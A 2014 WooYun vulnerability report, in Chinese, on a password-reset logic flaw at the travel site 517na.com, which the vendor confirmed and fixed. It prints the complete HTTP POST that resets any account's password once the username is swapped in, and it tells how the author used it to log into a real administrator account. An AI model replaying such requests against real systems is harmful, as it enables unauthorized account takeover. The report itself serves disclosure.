当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082582

漏洞标题:四川我要去哪517旅行网重置任意账号密码漏洞

相关厂商:517na.com

漏洞作者: Jim叔叔

提交时间:2014-11-10 10:18

修复时间:2014-11-11 21:40

公开时间:2014-11-11 21:40

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-10: 细节已通知厂商并且等待厂商处理中
2014-11-10: 厂商已经确认,细节仅向厂商公开
2014-11-11: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

呀,要毕业了,看到517na在校园招聘,去面试时,前台漂亮MM给我倒了一杯茶,面试官迟迟不来,于是...

详细说明:

我先注册了一个自己的账号,然后按照找回密码的正常流程走了一遍。猜测可能存在逻辑绕过:
然后我从主站fuzz到一个账号为qingxia,点击找回密码,

1.jpg


咦,打了马赛克!!右键查看源代码里发现有详细的手机号和邮箱。。(马赛克你是在逗我吗!)

2.jpg


在找回密码处点击获取验证码后,随便输入一个6位数(此处无需短信验证码正确与否),点下一步。
然后直接提交如下post包修改密码。(此数据包为我的账号用正常流程抓取到的第三步设置新密码的数据包)
注意:需修改ASP.NET_SessionId为当前sessionid,staffID修改为要重置密码的用户名qingxia

POST /FindPassword/ChangePsw HTTP/1.1
Host: user.517na.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://user.517na.com/FindPassword/ComfirmNewPwd?UserID=xjcjinmao&R=353730&D=2014-07-11%2022:05:23&Sign=C8690DB5B5240F7702755E8F8859622F
Content-Length: 31
Cookie: ASP.NET_SessionId=zvxqzk22ejubrmmk40hxr05e
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
password=123123&staffID=qingxia


3.jpg


返回OK!!!
尝试用qingxia 123123登录,成功进入后台,发现是一个票务分销商的账号:

4.jpg


查看源代码把我惊呆了,密码的md5清晰的写在了里面:

5.jpg


还是一个管理员账号:

6.jpg


就在此时,终于等到面试官叫我进去面试了,然后就没有然后了。。。

漏洞证明:

3.jpg


4.jpg


6.jpg

修复方案:

听说贵公司安全是运维在做。。。

版权声明:转载请注明来源 Jim叔叔@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-10 10:49

厂商回复:

谢谢,已确认,正在修复。

最新状态:

2014-11-11:已修复。